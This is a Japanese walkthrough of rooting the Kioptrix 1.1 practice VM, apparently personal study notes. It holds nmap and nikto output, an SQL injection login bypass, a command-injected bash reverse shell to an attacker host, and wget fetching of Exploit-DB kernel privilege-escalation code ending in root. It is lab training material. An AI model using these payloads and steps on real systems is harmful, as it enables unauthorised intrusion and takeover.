vulunhub Kioptrix 1.1 雑記
kiptorix 1.1
仮想マシン立てる時点で注意!
pentest
サービス調査
# nmap -Pn -p- 10.0.2.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:40 EDT Nmap scan report for 10.0.2.15 Host is up (0.000089s latency). Not shown: 65528 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 619/tcp open compaq-evm 631/tcp open ipp 3306/tcp open mysql MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 16.23 seconds # nmap -Pn -p 22,80,111,443,619,631,3306 -sV 10.0.2.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:42 EDT Nmap scan report for 10.0.2.15 Host is up (0.00063s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.52 ((CentOS)) 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/https? 619/tcp open status 1 (RPC #100024) 631/tcp open ipp CUPS 1.1 3306/tcp open mysql MySQL (unauthorized) MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.99 seconds # nmap -Pn -p 22,80,111,443,619,631,3306 -A 10.0.2.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:48 EDT Nmap scan report for 10.0.2.15 Host is up (0.00052s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/https? |_ssl-date: 2020-04-26T10:49:26+00:00; +4h00m01s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 |_ SSL2_RC4_128_WITH_MD5 619/tcp open status 1 (RPC #100024) 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop Host script results: |_clock-skew: 4h00m00s TRACEROUTE HOP RTT ADDRESS 1 0.52 ms 10.0.2.15 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 119.82 seconds
気になりどころ
詳細
OpenSSH 3.9p1 (protocol 1.99)
?
Apache httpd 2.0.52 (CentOS)
# nikto -h 10.0.2.15 -p 80 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.2.15 + Target Hostname: 10.0.2.15 + Target Port: 80 + Start Time: 2020-04-26 02:56:32 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.0.52 (CentOS) + Retrieved x-powered-by header: PHP/4.3.9 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + Uncommon header 'tcn' found, with contents: choice + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /manual/images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980 + OSVDB-3233: /icons/README: Apache default file found. + 8725 requests: 1 error(s) and 17 item(s) reported on remote host + End Time: 2020-04-26 02:57:08 (GMT-4) (36 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
firefoxより、ログインフォームを確認。
userに「a' or '1' = '1' -- 」
pingチェックフォーム。間違いなくosコマンドインジェクション。
# nc -nlvp 8080
フォームに「127.0.0.1;bash -i >& /dev/tcp/10.10.10.3/8080 0>&1」
リバシェ参考「http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet」
bash-3.00$ mysql --version mysql Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3
bash-3.00$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Exploit DBで検索すると、これが良さそう「https://www.exploit-db.com/exploits/9542」。
# searchsploit ip_append ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | exploits/linux_x86/local/9542.c ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result root@kali:~/EXattack/Vulunhub/Kiptorix1-1# cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c exploit.c # python -m SimpleHTTPServer
このexploitコードをtargetに移す。大体「/tmp」以下なら権限気にしなくて良い。
bash-3.00$ wget http://10.10.10.3:8000/exploit.c --07:57:35-- http://10.10.10.3:8000/exploit.c => `exploit.c' Connecting to 10.10.10.3:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 2,643 (2.6K) [text/plain] 0K .. 100% 18.67 MB/s 07:57:35 (18.67 MB/s) - `exploit.c' saved [2643/2643] bash-3.00$ gcc exploit.c exploit.c:109:28: warning: no newline at end of file
なんとこのexploit code欠陥品だった?
調べてみると成功した人と失敗している人がいる。
何でだ。キャリッジリターン28行目とかあるけど、注意されたの109行目なのだが。
最終的に刺さったのはこちらのコード。
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation | exploits/linux/local/9545.c
うーむ。新しいやつは古いやつに刺さるのか......?
bash-3.00$ gcc 9545.c -o 9545 9545.c:376:28: warning: no newline at end of file
最後の行に改行いれてもう一度。
bash-3.00$ rm 9545.c bash-3.00$ wget http://10.10.10.3:8000/9545.c --09:20:35-- http://10.10.10.3:8000/9545.c => `9545.c' Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,787 (9.6K) [text/plain] 0K ......... 100% 27.37 MB/s 09:20:35 (27.37 MB/s) - `9545.c' saved [9787/9787] bash-3.00$ gcc 9545.c -o 9545 bash-3.00$ ./9545 sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache)
mysql
sqlmapしたけど特に...
CUPS 1.1
プリンタ繋がってないと無理!
教訓
exploitコードに不備がある可能性もゼロではない?
そもそも、Kioptrix 1.1アプデされたのが理由な可能性も?